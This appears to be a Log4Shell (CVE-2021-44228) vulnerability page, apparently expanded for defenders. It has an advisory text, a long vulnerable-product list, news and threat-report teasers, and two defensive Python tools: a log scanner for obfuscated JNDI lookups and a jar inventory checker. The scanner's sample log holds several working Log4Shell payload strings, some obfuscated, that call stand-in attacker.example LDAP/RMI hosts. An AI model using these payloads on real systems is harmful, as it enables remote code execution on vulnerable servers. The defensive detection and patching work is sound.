Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
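The description above is the whole bug: anything that ends up in a log message is run through Log4j's `${...}` lookup substitution, and the `jndi` lookup will fetch and load from a remote LDAP/RMI server. In-the-wild payloads rarely arrive as a literal `${jndi:ldap://...}`; they hide behind nested lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) that Log4j resolves before it ever reaches the `jndi` prefix. The Python detector below is an added example, not code from this page or from the Apache project. It emulates only the subset of Log4j's substitution that is useful for obfuscation (the `lower` and `upper` lookups and the `:-` default syntax; every other lookup is treated as unresolvable, which is also what happens on a target where the referenced `env`/`sys` key does not exist), then matches the unwound string. The access-log lines and the `attacker.example` hosts are constructed for the demo.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} token: a body with no braces inside it, so nested
# lookups are resolved inside-out, the same order Log4j uses.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# What we are looking for once the obfuscation has been unwound.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def _resolve_one(body: str) -> Optional[str]:
    """Emulate a subset of Log4j's StrSubstitutor for one ${...} body.

    Handles 'prefix:key' and 'prefix:key:-default'. Only 'lower' and 'upper'
    are evaluated; any other prefix (env, sys, date, jndi, ...) is treated as
    unresolvable, so Log4j's fallback to the ':-' default is applied when one
    was given. Returning None means "leave the token untouched".
    """
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return default


def normalize(text: str, max_passes: int = 32) -> str:
    """Substitute innermost lookups repeatedly until nothing changes.

    The pass cap is deliberate: unbounded re-substitution of self-referential
    lookups is the behaviour CVE-2021-45105 turned into a denial of service.
    """
    for _ in range(max_passes):
        changed = False

        def _sub(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def find_jndi(text: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, host[:port]) of a JNDI lookup hidden in text, else None."""
    m = _JNDI.search(normalize(text))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed access-log sample: one benign line, four obfuscation styles seen
# in the wild, and one harmless lookup that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example:1389/b}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:11 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.example/d}"',
    '10.0.0.10 - - [10/Dec/2021:13:01:20 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for line_no, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme} to {host}")
```

Run it over request logs, WAF captures or proxy logs; the only thing it trusts is the unwound text, so a rule that merely greps for the literal `jndi` misses lines 3 to 5 while this does not. It is a triage aid, not a block list: attackers can still choose lookups this emulator does not evaluate, which is why the real fix is a log4j-core version without the lookup, not a pattern.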
Vulnerable Product |
---|
apache log4j |
apache log4j 2.0 |
siemens sppa-t3000 ses3000 firmware |
siemens capital |
siemens capital 2019.1 |
siemens comos |
siemens desigo cc advanced reports 4.0 |
siemens desigo cc advanced reports 4.1 |
siemens desigo cc advanced reports 4.2 |
siemens desigo cc advanced reports 5.0 |
siemens desigo cc advanced reports 5.1 |
siemens desigo cc info center 5.0 |
siemens desigo cc info center 5.1 |
siemens e-car operation center |
siemens energy engage 3.1 |
siemens energyip 8.5 |
siemens energyip 8.6 |
siemens energyip 8.7 |
siemens energyip 9.0 |
siemens energyip prepay 3.7 |
siemens energyip prepay 3.8 |
siemens gma-manager |
siemens head-end system universal device integration system |
siemens industrial edge management |
siemens industrial edge management hub |
siemens logo! soft comfort |
siemens mendix |
siemens mindsphere |
siemens navigator |
siemens nx |
siemens opcenter intelligence |
siemens operation scheduler |
siemens sentron powermanager 4.1 |
siemens sentron powermanager 4.2 |
siemens siguard dsa 4.2 |
siemens siguard dsa 4.3 |
siemens siguard dsa 4.4 |
siemens sipass integrated 2.80 |
siemens sipass integrated 2.85 |
siemens siveillance command |
siemens siveillance control pro |
siemens siveillance identity 1.5 |
siemens siveillance identity 1.6 |
siemens siveillance vantage |
siemens siveillance viewpoint |
siemens solid edge cam pro |
siemens solid edge harness design |
siemens solid edge harness design 2020 |
siemens spectrum power 4 |
siemens spectrum power 4 4.70 |
siemens spectrum power 7 |
siemens spectrum power 7 2.30 |
siemens teamcenter |
siemens vesys |
siemens vesys 2019.1 |
siemens xpedition enterprise |
siemens xpedition package integrator |
intel audio development kit |
intel computer vision annotation tool |
intel data center manager |
intel genomics kernel library |
intel oneapi sample browser |
intel secure device onboard |
intel sensor solution firmware development kit |
intel system debugger |
intel system studio |
debian debian linux 9.0 |
debian debian linux 10.0 |
debian debian linux 11.0 |
fedoraproject fedora 34 |
fedoraproject fedora 35 |
sonicwall email security |
netapp active iq unified manager |
netapp cloud insights |
netapp cloud manager |
netapp cloud secure agent |
netapp oncommand insight |
netapp ontap tools |
netapp snapcenter |
cisco advanced malware protection virtual private cloud appliance |
cisco automated subsea tuning |
cisco automated subsea tuning 02.01.00 |
cisco broadworks |
cisco business process automation |
cisco cloud connect |
cisco cloudcenter |
cisco cloudcenter cost optimizer |
cisco cloudcenter suite admin |
cisco cloudcenter workload manager |
cisco cloudcenter suite 4.10(0.15) |
cisco cloudcenter suite 5.3(0) |
cisco cloudcenter suite 5.4(1) |
cisco cloudcenter suite 5.5(0) |
cisco cloudcenter suite 5.5(1) |
cisco common services platform collector |
cisco common services platform collector 002.009(000.000) |
cisco common services platform collector 002.009(000.001) |
cisco common services platform collector 002.009(000.002) |
cisco common services platform collector 002.009(001.000) |
cisco common services platform collector 002.009(001.001) |
cisco common services platform collector 002.009(001.002) |
cisco common services platform collector 002.010(000.000) |
cisco connected analytics for network deployment 006.004.000.003 |
cisco connected analytics for network deployment 006.005.000. |
cisco connected analytics for network deployment 006.005.000.000 |
cisco connected analytics for network deployment 007.000.001 |
cisco connected analytics for network deployment 007.001.000 |
cisco connected analytics for network deployment 007.002.000 |
cisco connected analytics for network deployment 7.3 |
cisco connected analytics for network deployment 007.003.000 |
cisco connected analytics for network deployment 007.003.001.001 |
cisco connected analytics for network deployment 007.003.003 |
cisco connected analytics for network deployment 008.000.000 |
cisco connected analytics for network deployment 008.000.000.000.004 |
cisco connected mobile experiences |
cisco contact center domain manager |
cisco contact center management portal |
cisco crosswork data gateway |
cisco crosswork data gateway 3.0.0 |
cisco crosswork network automation |
cisco crosswork network automation 2.0.0 |
cisco crosswork network automation 3.0.0 |
cisco crosswork network automation 4.1.0 |
cisco crosswork network automation 4.1.1 |
cisco crosswork network controller |
cisco crosswork network controller 3.0.0 |
cisco crosswork optimization engine |
cisco crosswork optimization engine 3.0.0 |
cisco crosswork platform infrastructure |
cisco crosswork platform infrastructure 4.1.0 |
cisco crosswork zero touch provisioning |
cisco crosswork zero touch provisioning 3.0.0 |
cisco customer experience cloud agent |
cisco cx cloud agent 001.012 |
cisco cyber vision 4.0.2 |
cisco cyber vision sensor management extension |
cisco cyber vision sensor management extension 4.0.2 |
cisco data center network manager |
cisco data center network manager 11.3(1) |
cisco dna center |
cisco dna center 2.2.2.8 |
cisco dna spaces |
cisco dna spaces connector |
cisco emergency responder |
cisco emergency responder 11.5 |
cisco emergency responder 11.5(4.65000.14) |
cisco emergency responder 11.5(4.66000.14) |
cisco enterprise chat and email |
cisco enterprise chat and email 12.0(1) |
cisco enterprise chat and email 12.5(1) |
cisco enterprise chat and email 12.6(1) |
cisco evolved programmable network manager |
cisco evolved programmable network manager 3.0 |
cisco evolved programmable network manager 3.1 |
cisco evolved programmable network manager 4.0 |
cisco evolved programmable network manager 4.1 |
cisco evolved programmable network manager 5.0 |
cisco evolved programmable network manager 5.1 |
cisco finesse |
cisco finesse 12.5(1) |
cisco finesse 12.6(1) |
cisco firepower threat defense 6.2.3 |
cisco firepower threat defense 6.3.0 |
cisco firepower threat defense 6.4.0 |
cisco firepower threat defense 6.5.0 |
cisco firepower threat defense 6.6.0 |
cisco firepower threat defense 6.7.0 |
cisco firepower threat defense 7.0.0 |
cisco firepower threat defense 7.1.0 |
cisco fog director |
cisco fxos 6.2.3 |
cisco fxos 6.3.0 |
cisco fxos 6.4.0 |
cisco fxos 6.5.0 |
cisco fxos 6.6.0 |
cisco fxos 6.7.0 |
cisco fxos 7.0.0 |
cisco fxos 7.1.0 |
cisco identity services engine |
cisco identity services engine 2.4.0 |
cisco identity services engine 002.004(000.914) |
cisco identity services engine 002.006(000.156) |
cisco identity services engine 002.007(000.356) |
cisco identity services engine 003.000(000.458) |
cisco identity services engine 003.001(000.518) |
cisco identity services engine 003.002(000.116) |
cisco integrated management controller supervisor |
cisco integrated management controller supervisor 002.003(002.000) |
cisco integrated management controller supervisor 2.3.2.0 |
cisco intersight virtual appliance |
cisco intersight virtual appliance 1.0.9-343 |
cisco iot operations dashboard |
cisco mobility services engine |
cisco network assurance engine |
cisco network assurance engine 6.0(2.1912) |
cisco network dashboard fabric controller 11.0(1) |
cisco network dashboard fabric controller 11.1(1) |
cisco network dashboard fabric controller 11.2(1) |
cisco network dashboard fabric controller 11.3(1) |
cisco network dashboard fabric controller 11.4(1) |
cisco network dashboard fabric controller 11.5(1) |
cisco network dashboard fabric controller 11.5(2) |
cisco network dashboard fabric controller 11.5(3) |
cisco network insights for data center 6.0(2.1914) |
cisco network services orchestrator |
cisco nexus dashboard |
cisco nexus insights |
cisco optical network controller |
cisco optical network controller 1.1 |
cisco packaged contact center enterprise |
cisco packaged contact center enterprise 11.6(1) |
cisco paging server |
cisco paging server 8.3(1) |
cisco paging server 8.4(1) |
cisco paging server 8.5(1) |
cisco paging server 9.0(1) |
cisco paging server 9.0(2) |
cisco paging server 9.1(1) |
cisco paging server 12.5(2) |
cisco paging server 14.0(1) |
cisco prime service catalog |
cisco prime service catalog 12.1 |
cisco sd-wan vmanage |
cisco sd-wan vmanage 20.3 |
cisco sd-wan vmanage 20.4 |
cisco sd-wan vmanage 20.5 |
cisco sd-wan vmanage 20.6 |
cisco sd-wan vmanage 20.6.1 |
cisco sd-wan vmanage 20.7 |
cisco sd-wan vmanage 20.8 |
cisco smart phy |
cisco smart phy 3.1.2 |
cisco smart phy 3.1.3 |
cisco smart phy 3.1.4 |
cisco smart phy 3.1.5 |
cisco smart phy 3.2.1 |
cisco smart phy 21.3 |
cisco ucs central |
cisco ucs central software 2.0 |
cisco ucs central software 2.0(1a) |
cisco ucs central software 2.0(1b) |
cisco ucs central software 2.0(1c) |
cisco ucs central software 2.0(1d) |
cisco ucs central software 2.0(1e) |
cisco ucs central software 2.0(1f) |
cisco ucs central software 2.0(1g) |
cisco ucs central software 2.0(1h) |
cisco ucs central software 2.0(1k) |
cisco ucs central software 2.0(1l) |
cisco ucs director |
cisco unified communications manager |
cisco unified communications manager 11.5(1) |
cisco unified communications manager 11.5(1)su3 |
cisco unified communications manager 11.5(1.17900.52) |
cisco unified communications manager 11.5(1.18119.2) |
cisco unified communications manager 11.5(1.18900.97) |
cisco unified communications manager 11.5(1.21900.40) |
cisco unified communications manager 11.5(1.22900.28) |
cisco unified communications manager im and presence service |
cisco unified communications manager im and presence service 11.5(1) |
cisco unified communications manager im & presence service 11.5(1) |
cisco unified communications manager im & presence service 11.5(1.22900.6) |
cisco unified computing system 006.008(001.000) |
cisco unified contact center enterprise |
cisco unified contact center enterprise 11.6(2) |
cisco unified contact center enterprise 12.0(1) |
cisco unified contact center enterprise 12.5(1) |
cisco unified contact center enterprise 12.6(1) |
cisco unified contact center enterprise 12.6(2) |
cisco unified contact center express |
cisco unified contact center express 12.5(1) |
cisco unified contact center express 12.6(1) |
cisco unified contact center express 12.6(2) |
cisco unified contact center management portal 12.6(1) |
cisco unified customer voice portal |
cisco unified customer voice portal 11.6 |
cisco unified customer voice portal 11.6(1) |
cisco unified customer voice portal 12.0 |
cisco unified customer voice portal 12.0(1) |
cisco unified customer voice portal 12.5 |
cisco unified customer voice portal 12.5(1) |
cisco unified customer voice portal 12.6(1) |
cisco unified intelligence center |
cisco unified intelligence center 12.6(1) |
cisco unified intelligence center 12.6(2) |
cisco unified sip proxy |
cisco unified sip proxy 010.000(000) |
cisco unified sip proxy 010.000(001) |
cisco unified sip proxy 010.002(000) |
cisco unified sip proxy 010.002(001) |
cisco unified workforce optimization |
cisco unified workforce optimization 11.5(1) |
cisco unity connection |
cisco unity connection 11.5 |
cisco unity connection 11.5(1.10000.6) |
cisco video surveillance manager 7.14(1.26) |
cisco video surveillance manager 7.14(2.26) |
cisco video surveillance manager 7.14(3.025) |
cisco video surveillance manager 7.14(4.018) |
cisco video surveillance operations manager |
cisco virtual topology system |
cisco virtual topology system 2.6.6 |
cisco virtualized infrastructure manager |
cisco virtualized voice browser |
cisco wan automation engine |
cisco wan automation engine 7.1.3 |
cisco wan automation engine 7.2.1 |
cisco wan automation engine 7.2.2 |
cisco wan automation engine 7.2.3 |
cisco wan automation engine 7.3 |
cisco wan automation engine 7.4 |
cisco wan automation engine 7.5 |
cisco wan automation engine 7.6 |
cisco webex meetings server |
cisco webex meetings server 3.0 |
cisco webex meetings server 4.0 |
cisco workload optimization manager |
snowsoftware snow commander |
snowsoftware vm access proxy |
bentley synchro |
bentley synchro 4d |
percussion rhythmyx |
apple xcode |
Log4j Vulnerabilities: Attack Insights (Symantec Threat Intelligence, 23 Dec 2021). Symantec data shows variation and scope of attacks. Apache Log4j is a Java-based logging utility. The library's main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild (Symantec Threat Intelligence, 11 Dec 2021). Symantec products will protect against attempted exploits of the critical CVE-2021-44228 vulnerability. A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Budworm: Espionage Group Returns to Targeting U.S. Organizations (Symantec Threat Intelligence, 13 Oct 2022). Recent attacks by the group have spanned continents and include the first confirmed attacks seen against the U.S. in a number of years. The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...

Ransomware: How Attackers are Breaching Corporate Networks (Symantec Threat Intelligence, 28 Apr 2022). Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations. Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets (Symantec Threat Intelligence, 27 Apr 2022). The espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications. The North Korea-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

The Threat Landscape in 2021 (Symantec Threat Intelligence, 19 Jan 2022). Symantec takes a look at the cyber security trends that shaped the year. From the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at some of the major thre...
IT threat evolution in Q3 2023 (Kaspersky). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q3 2023: Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe. A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus components. Attempts to run malware for stealing money from online bank accounts were stopped on the com...

IT threat evolution in Q2 2023 (Kaspersky; published as separate non-mobile and mobile statistics reports). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q2 2023: Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe. A total of 209,716,810 unique links were detected by Web ...

IT threat evolution in Q1 2023 (Kaspersky; published as separate non-mobile and mobile statistics reports). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q1 2023: Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. Web Anti-Virus detected 246,912,694 unique URLs ...

IT threat evolution in Q3 2022 (Kaspersky; published as separate non-mobile and mobile statistics reports). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...

IT threat evolution in Q2 2022 (Kaspersky; published as separate non-mobile and mobile statistics reports). These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q2 2022: Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. Web Anti-Virus recognized 273,033,368 unique URLs as ma...
It's not as though folks haven't been warned about this. There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...

Apply fixes responsibly in a timely manner or face the wrath of Lina Khan. The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...

Third major fix in ten days is an infinite recursion flaw rated 7.5/10. The Apache Software Foundation (ASF) has revealed a third bug in its Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That's the third new version of the tool in the last ten days. In case you haven't been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...

Federal agencies have a week to get their systems patched. The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...

Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with the security flaw along with world + dog. Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Successful...

Now the open-source logging library's JNDI is disabled entirely by default, and message lookups are removed. Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality: JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
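The practical consequence of three releases in ten days is that "which log4j-core do I actually ship, and does it still contain the lookup class?" has to be answered per artifact, including copies buried inside Spring Boot fat jars and .war files where a package manager never sees them. The Python inventory script below is an added example, not code from this page or from Apache. It opens every jar/war/ear it finds, recurses into nested archives with a depth cap, reads the version from Maven's `pom.properties`, checks whether `org/apache/logging/log4j/core/lookup/JndiLookup.class` is still present, and classifies the version against the ranges stated on this page (CVE-2021-44228: 2.0-beta9 through 2.15.0 minus 2.12.2/2.12.3/2.3.1; CVE-2021-45105: 2.0-alpha1 through 2.16.0). Two facts it relies on come from the Apache security advisories rather than from this page: 2.12.3 and 2.3.1 also fix CVE-2021-45105, and deleting `JndiLookup.class` from the jar is the documented workaround for CVE-2021-44228 on 2.10+ where an upgrade was not possible. `build_demo_jar` and `build_demo_fat_jar` construct stand-in archives containing only the entries the scanner reads, so the demo runs offline.

```python
import io
import os
import re
import zipfile
from typing import Dict, Iterator, List, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 4  # nested-archive recursion guard (zip bombs, runaway nesting)

_VER = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?$")


def parse_version(s: str) -> Tuple[int, int, int, int, str, int]:
    """'2.0-beta9' -> sortable tuple; pre-releases sort before the final release."""
    m = _VER.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {s!r}")
    major, minor, patch, tag, tagnum = m.groups()
    return (int(major), int(minor), int(patch or 0),
            0 if tag else 1, (tag or "").lower(), int(tagnum or 0))


def affected(version: str) -> List[str]:
    """CVEs a log4j-core version is subject to, by version range alone."""
    v = parse_version(version)
    cves = []
    # Range from this page's description of CVE-2021-44228.
    if parse_version("2.0-beta9") <= v <= parse_version("2.15.0") \
            and version not in ("2.12.2", "2.12.3", "2.3.1"):
        cves.append("CVE-2021-44228")
    # Range from this page; the 2.12.3/2.3.1 exclusions are from the Apache advisory.
    if parse_version("2.0-alpha1") <= v <= parse_version("2.16.0") \
            and version not in ("2.12.3", "2.3.1"):
        cves.append("CVE-2021-45105")
    return cves


def inspect_archive(data: bytes, label: str, depth: int = 0) -> Iterator[Dict]:
    """Yield one finding per log4j-core found in `data` (a zip/jar as bytes),
    recursing into nested archives. Non-zip input yields nothing."""
    if depth > MAX_DEPTH:
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props: Dict[str, str] = {}
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if "=" in line and not line.startswith("#"):
                    k, v = line.split("=", 1)
                    props[k.strip()] = v.strip()
            version = props.get("version", "0.0")
            has_jndi = JNDI_CLASS in names
            cves = affected(version)
            if not has_jndi and "CVE-2021-44228" in cves:
                # Apache-documented workaround: JndiLookup.class removed from the jar.
                cves = [c for c in cves if c != "CVE-2021-44228"]
            yield {"path": label, "version": version,
                   "jndi_lookup_present": has_jndi, "cves": cves}
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(zf.read(name), f"{label}!/{name}", depth + 1)


def scan_tree(root: str) -> List[Dict]:
    """Walk a directory tree and return every log4j-core finding."""
    findings: List[Dict] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def build_demo_jar(version: str, include_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar (only the entries the scanner reads)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#generated\nversion={version}\n"
                               "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # only the entry name matters
    return buf.getvalue()


def build_demo_fat_jar(inner_jar: bytes,
                       inner_name: str = "BOOT-INF/lib/log4j-core-2.14.1.jar") -> bytes:
    """Constructed application jar that embeds log4j-core the way Spring Boot does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, inner_jar)
    return buf.getvalue()


if __name__ == "__main__":
    demo = build_demo_fat_jar(build_demo_jar("2.14.1"))
    for finding in inspect_archive(demo, "app.jar"):
        print(finding)
```

Point `scan_tree` at a deployment directory and treat every finding whose `cves` list is non-empty as work. Two caveats a practitioner will hit: shaded or relocated builds can drop `pom.properties`, so a clean result from this script is not proof of absence (hash the class files against known releases as a second check), and the script inspects files on disk, not what a running JVM actually loaded; confirm with the process's classpath before closing a ticket.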
Private equity owners play pass the parcel. One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation. "The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners. Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools – which a...
This might be the bug that deserves the website, logo and book deal. Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly, for now, on turning infected devices into cryptocurrency-mining botnet drones. Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post. Apache Log4j is an open-source logging utility written in Java that is used all over the world in many software packag...

Prepare to have a very busy weekend of mitigating and patching. An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers. Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation." Crafted proof-of-concept code snippet...

As America, UK, Canada, Australia and friends share an essential bible to detect and thwart infections. Seven nations today issued an alert, plus protection tips, about LockBit, the prolific ransomware-as-a-service gang. The group's affiliates remain a global scourge, costing US victims alone more than $90 million from roughly 1,700 attacks since 2020, we're told. The joint security advisory, issued by the US Cybersecurity and Infrastructure Security Agency (CISA), FBI, Multi-State Information Sharing and Analysis Center (MS-ISAC), and cybersecurity authorities in Australia, Canada, the UK, Ge...

Lax patching and vulnerable small biz kit make life easy for Beijing's secret-stealers. Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 (aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk) and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours. The advisory describes APT40 as a "state-sponsored cyber group" and the People's Republic of China (PRC) as that sponsor. The agencies that authored the advis...

Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad. In Brief: Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...

Here's how Wiz can help (sponsored feature). When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell, a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games. In what might be called the happier days of the past, flaws were something that affected single applications and individual...

Miscreants deployed cryptominers and backdoors since late December, Sophos says. VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware. In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos research...

Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs. The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers, tracked as CV...

Latest offensive cyber group to switch to atypical programming language for payloads. Research into Lazarus Group's attacks using Log4Shell has revealed novel malware strains written in an atypical programming language. DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, C...

